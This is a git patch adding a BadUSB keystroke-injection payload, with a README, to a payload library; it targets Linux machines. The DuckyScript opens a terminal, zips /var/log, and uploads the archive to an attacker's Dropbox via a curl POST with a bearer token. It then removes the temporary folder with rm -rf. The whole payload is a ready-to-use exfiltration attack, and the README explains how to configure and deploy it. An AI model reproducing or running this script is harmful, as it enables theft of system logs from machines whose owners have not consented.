From b6494328325f24e65cd4b37fbc131d4b76131b46 Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Tue, 7 Mar 2023 11:57:46 +0100
Subject: [PATCH] [+] README.md file
---
.../ExfiltrateLinuxLogFiles/README.md | 33 ++++++++
.../ExfiltrateLinuxLogFiles/payload.txt | 80 +++++++++++++++++++
2 files changed, 113 insertions(+)
create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
create mode 100644 payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
new file mode 100644
index 0000000..1ea1e56
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -0,0 +1,33 @@
+
+# Exfiltrate Linux Log Files - BADUSB ✅
+
+A script used to take linux logs.
+
+**Category**: Exfiltration, Execution
+
+[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
+
+## Description
+
+A script used to take linux logs.
+
+Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Linux System
+* * Terminal that can be opened by the shortcommand CTRL-ALT t
+* DropBox Account for the access token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set your dropbox access token
+* Change if needed the folder path interessed (i.e. /var/log)
+* Change (if you think that it is necessary) the delay of the zipping operation
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
new file mode 100644
index 0000000..dbd546f
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -0,0 +1,80 @@
+REM ######################################################
+REM # |
+REM # Title : Exfiltrate Linux Logs With Dropbox |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration, Execution |
+REM # Target : Linux |
+REM # |
+REM ######################################################
+
+REM Requirements:
+REM - Internet Connection
+REM - Dropbox Account
+REM - - DROPBOX_ACCESS_TOKEN
+
+
+DELAY 1000
+CTRL-ALT t
+
+REM Required: Set here your Dropbox access TOKEN
+DELAY 2000
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+
+DELAY 500
+STRING USER_NAME=$(whoami)
+ENTER
+
+REM Create random num
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
+ENTER
+
+REM Zip path
+DELAY 500
+STRING ZIP_NAME="$RANDOM.zip"
+ENTER
+DELAY 500
+STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
+ENTER
+
+REM Default log path
+DELAY 500
+STRING LOG_PATH="/var/log/"
+ENTER
+
+DELAY 500
+STRING zip -r "$ZIP_PATH" "$LOG_PATH"
+ENTER
+
+REM Delay of zipping operation - it depends
+DELAY 10000
+
+DELAY 500
+STRING DROPBOX_FOLDER="/$ZIP_NAME"
+ENTER
+
+REM Send to Dropbox function
+DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+DELAY 500
+STRING curl -X POST
+STRING DROPBOX_API_LINK
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+REM Send timing - it depends
+DELAY 5000
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER